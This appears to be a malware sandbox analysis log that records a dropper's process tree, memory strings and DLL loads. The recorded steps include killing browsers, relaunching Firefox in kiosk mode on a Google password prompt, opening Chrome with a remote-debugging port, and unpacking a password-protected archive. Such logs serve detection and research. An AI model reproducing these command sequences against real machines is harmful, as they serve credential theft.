                          Source: 6f9ea40b81.exe, 00000008.00000003.3155325996.0000000003655000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3150682552.0000000003687000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866103686.0000000005B69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3381923396.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: file.exeReversingLabs: Detection: 57%
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe "C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe "C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe "C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43d925f0-9685-4c56-9e32-dc32a554bcb7} 6580 "\\.\pipe\gecko-crash-server-pipe.6580" 1c7a166f310 socket
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe "C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe "C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe "C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe"
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3032 -parentBuildID 20230927232528 -prefsHandle 3116 -prefMapHandle 3112 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0925204-3e74-4449-abae-cbe6b6d93c42} 6580 "\\.\pipe\gecko-crash-server-pipe.6580" 1c7b3908810 rdd
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe "C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2684 --field-trial-handle=2528,i,13978384918087299691,6631337269528066298,262144 /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe "C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe "C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe "C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe "C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe "C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe "C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe "C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeProcess created: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe "C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe "C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe "C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe "C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe "C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe "C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe "C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe "C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe "C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe "C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43d925f0-9685-4c56-9e32-dc32a554bcb7} 6580 "\\.\pipe\gecko-crash-server-pipe.6580" 1c7a166f310 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3032 -parentBuildID 20230927232528 -prefsHandle 3116 -prefMapHandle 3112 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0925204-3e74-4449-abae-cbe6b6d93c42} 6580 "\\.\pipe\gecko-crash-server-pipe.6580" 1c7b3908810 rdd
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2684 --field-trial-handle=2528,i,13978384918087299691,6631337269528066298,262144 /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeProcess created: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe "C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: msvcr100.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: rstrtmgr.dllJump to behavior
